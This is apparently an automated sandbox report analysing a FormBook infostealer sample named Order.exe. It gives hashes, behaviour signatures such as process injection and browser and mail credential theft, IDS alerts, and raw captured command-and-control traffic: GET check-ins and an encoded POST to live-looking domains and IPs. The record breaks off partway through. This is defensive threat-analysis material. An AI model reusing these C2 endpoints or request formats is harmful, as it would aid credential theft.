Windows Analysis Report
Order.exe

Overview

General Information

Sample name: Order.exe
Analysis ID: 1554471
MD5: 7e1afc9b104325c33a1a94e672725e0b
SHA1: ab3b931b1dcf8cb9aaed3525ce657a85d2c4326a
SHA256: eaa050e146a491a37439f2c6e8be17f57b97c6f6ed12c9eaf982e55810031483
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Order.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 7E1AFC9B104325C33A1A94E672725E0B)
    • Order.exe (PID: 5996 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 7E1AFC9B104325C33A1A94E672725E0B)
      • lOYqgVWsbtwCn.exe (PID: 1396 cmdline: "C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 3380 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • firefox.exe (PID: 5908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches (unpacked PE)
Source | Rule | Description | Author | Strings
9.2.Order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.Order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T15:30:04.898207+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.7 | 49735 | TCP
2024-11-12T15:30:43.873121+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.7 | 49921 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T15:30:57.257278+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49965 | 85.159.66.93 | 80 | TCP
2024-11-12T15:31:21.069853+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49980 | 91.184.0.200 | 80 | TCP
2024-11-12T15:31:34.753504+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49984 | 194.9.94.85 | 80 | TCP
2024-11-12T15:31:48.572323+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49988 | 170.39.213.43 | 80 | TCP
2024-11-12T15:32:01.943439+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49992 | 13.248.169.48 | 80 | TCP
2024-11-12T15:32:15.679445+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49996 | 38.47.232.194 | 80 | TCP
2024-11-12T15:32:29.198864+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50000 | 167.172.133.32 | 80 | TCP
2024-11-12T15:32:43.135959+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50005 | 162.0.211.143 | 80 | TCP

AV Detection

Source: Order.exe | ReversingLabs: Detection: 24%
Source: Yara match | File source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Order.exe | Joe Sandbox ML: detected
Source: Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: UYVh.pdbSHA256 source: Order.exe
Source: Binary string: fc.pdb source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fc.pdbGCTL source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UYVh.pdb source: Order.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3121159220.00000000001DE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0321C500 FindFirstFileW,FindNextFileW,FindClose, | 12_2_0321C500
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 4x nop then pop edi | 11_2_00A39295
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 4x nop then xor eax, eax | 11_2_00A3CB3B
Source: C:\Windows\SysWOW64\fc.exe | Code function: 4x nop then xor eax, eax | 12_2_03209D00
Source: C:\Windows\SysWOW64\fc.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_03C104DE

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49965 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49980 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49996 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49988 -> 170.39.213.43:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50000 -> 167.172.133.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50005 -> 162.0.211.143:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49984 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49992 -> 13.248.169.48:80
Source: DNS query: www.tesetturhanzade.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 91.184.0.200
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: HOSTNETNL
Source: Joe Sandbox View | ASN Name: LOOPIASE
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49735
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49921
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: global traffic | HTTP traffic detected:
    GET /ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.tesetturhanzade.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9 HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.kantinestoel.online
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.deeplungatlas.org
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.ultrawin23.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.sonoscan.org
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.zz67x.top
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.omnibizlux.biz
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Host: www.vibixx.site
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Source: global traffic | DNS traffic detected: DNS query: www.tangible.online
Source: global traffic | DNS traffic detected: DNS query: www.tesetturhanzade.xyz
Source: global traffic | DNS traffic detected: DNS query: www.kantinestoel.online
Source: global traffic | DNS traffic detected: DNS query: www.deeplungatlas.org
Source: global traffic | DNS traffic detected: DNS query: www.ultrawin23.shop
Source: global traffic | DNS traffic detected: DNS query: www.sonoscan.org
Source: global traffic | DNS traffic detected: DNS query: www.zz67x.top
Source: global traffic | DNS traffic detected: DNS query: www.omnibizlux.biz
Source: global traffic | DNS traffic detected: DNS query: www.vibixx.site
Source: global traffic | DNS traffic detected: DNS query: www.rka6460.online
Source: unknown | HTTP traffic detected:
    POST /ggvc/ HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Host: www.kantinestoel.online
    Origin: http://www.kantinestoel.online
    Cache-Control: no-cache
    Connection: close
    Content-Length: 218
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.kantinestoel.online/ggvc/
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
    Data Raw: 5a 74 77 6c 51 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 35 64 78 5a 57 4d 55 57 6f 69 30 42 72 35 77 46 79 6d 37 69 77 51 58 45 42 6a 45 66 79 74 74 50 4e 68 4f 46 56 45 65 78 54 4e 48 36 35 56 65 78 51 3d 3d
    Data Ascii: ZtwlQ=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq05dxZWMUWoi0Br5wFym7iwQXEBjEfyttPNhOFVEexTNH65VexQ==
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.1
    Date: Tue, 12 Nov 2024 14:30:57 GMT
    Content-Length: 0
    Connection: close
    X-Rate-Limit-Limit: 5s
    X-Rate-Limit-Remaining: 19
    X-Rate-Limit-Reset: 2024-11-12T14:31:02.0765892Z
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:31:13 GMT
    Server: Apache
    X-Xss-Protection: 1; mode=block
    Referrer-Policy: no-referrer-when-downgrade
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Length: 196
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:31:15 GMT
    Server: Apache
    X-Xss-Protection: 1; mode=block
    Referrer-Policy: no-referrer-when-downgrade
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Length: 196
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:31:18 GMT
    Server: Apache
    X-Xss-Protection: 1; mode=block
    Referrer-Policy: no-referrer-when-downgrade
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Length: 196
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:31:20 GMT
    Server: Apache
    X-Xss-Protection: 1; mode=block
    Referrer-Policy: no-referrer-when-downgrade
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Length: 196
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 12 Nov 2024 14:32:07 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 12 Nov 2024 14:32:10 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 12 Nov 2024 14:32:12 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 12 Nov 2024 14:32:15 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Tue, 12 Nov 2024 14:32:21 GMT
